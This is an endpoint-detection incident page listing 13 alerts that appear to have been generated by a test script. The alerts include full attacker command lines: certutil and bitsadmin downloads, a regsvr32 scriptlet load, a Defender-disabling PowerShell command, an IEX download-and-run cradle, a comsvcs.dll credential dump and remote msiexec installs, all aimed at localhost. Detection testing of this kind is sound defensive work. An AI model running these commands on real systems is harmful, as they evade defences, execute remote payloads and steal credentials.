Back to list

Critical CINC-20251221-25471C12 new

Aggregate ID: aggind:561559e2fcea400ba3601b74d64aa30b:4461971219

Incident Overview

Incident ID CINC-20251221-25471C12
Severity Critical (90)
Status new
Alert Count 13
Host Count 1

Timeline

First Seen 2025-12-22 06:45:32
Last Seen 2025-12-22 06:46:34
Duration 0d 0h 1m
Created 2025-12-22 08:36
Updated 2026-01-13 15:14

Kill Chain Analysis

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...
Observed Tactics:
Execution Command and Control Defense Evasion Credential Access Persistence
Techniques:
User Execution Ingress Tool Transfer Regsvr32 PowerShell Rundll32 OS Credential Dumping BITS Jobs Event Triggered Execution

Affected Hosts (1)

DESKTOP-FNUMV3U

Related Alerts (13)

Severity Status Hostname Description Tactic Command Line Time
High new DESKTOP-FNUMV3U Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/mal.exe C:\Users\User\AppData\Local\Temp\cert_test.exe 12-22 06:46
Informational new DESKTOP-FNUMV3U A process has written a known EICAR test file. Review the files written by the triggered process. Execution "python" mega_incident_generator.py --rounds 2 --interval 30 12-22 06:46
High new DESKTOP-FNUMV3U A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-22 06:46
High new DESKTOP-FNUMV3U A PowerShell script attempted to bypass Microsoft's AntiMalware Scan Interface (AMSI). PowerShell exploit kits often attempt to bypass AMSI to evade detection. Review the script. Execution C:\WINDOWS\system32\cmd.exe /c "powershell Set-MpPreference -DisableRealtimeMonitoring $true" 12-22 06:46
High new DESKTOP-FNUMV3U A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line. Execution C:\WINDOWS\system32\cmd.exe /c "powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/ps')"" 12-22 06:46
High new DESKTOP-FNUMV3U Rundll32 launched with unusual arguments. This occasionally results from applications misusing rundll32, but it might be malware preparing to hollow out the process or abusing it to launch a malicious payload. Review the command line and the process tree. Defense Evasion rundll32 comsvcs.dll MiniDump 123 C:\Users\User\AppData\Local\Temp\dump.dmp full 12-22 06:46
High new DESKTOP-FNUMV3U Rundll32 launched with unusual arguments. This occasionally results from applications misusing rundll32, but it might be malware preparing to hollow out the process or abusing it to launch a malicious payload. Review the command line and the process tree. Defense Evasion C:\WINDOWS\system32\cmd.exe /c "rundll32 comsvcs.dll MiniDump 123 C:\Users\User\AppData\Local\Temp\dump.dmp full" 12-22 06:46
Critical new DESKTOP-FNUMV3U A process appears to be accessing credentials and might be dumping passwords. If this is unexpected, review the process tree. Credential Access rundll32 comsvcs.dll MiniDump 123 C:\Users\User\AppData\Local\Temp\dump.dmp full 12-22 06:46
High new DESKTOP-FNUMV3U A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/test C:\Users\User\AppData\Local\Temp\bits.exe 12-22 06:46
High new DESKTOP-FNUMV3U Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-22 06:46
High new DESKTOP-FNUMV3U Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-22 06:46
High new DESKTOP-FNUMV3U Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-22 06:46
Informational new DESKTOP-FNUMV3U A process has written a known EICAR test file. Review the files written by the triggered process. Execution "python" mega_incident_generator.py --rounds 2 --interval 30 12-22 06:45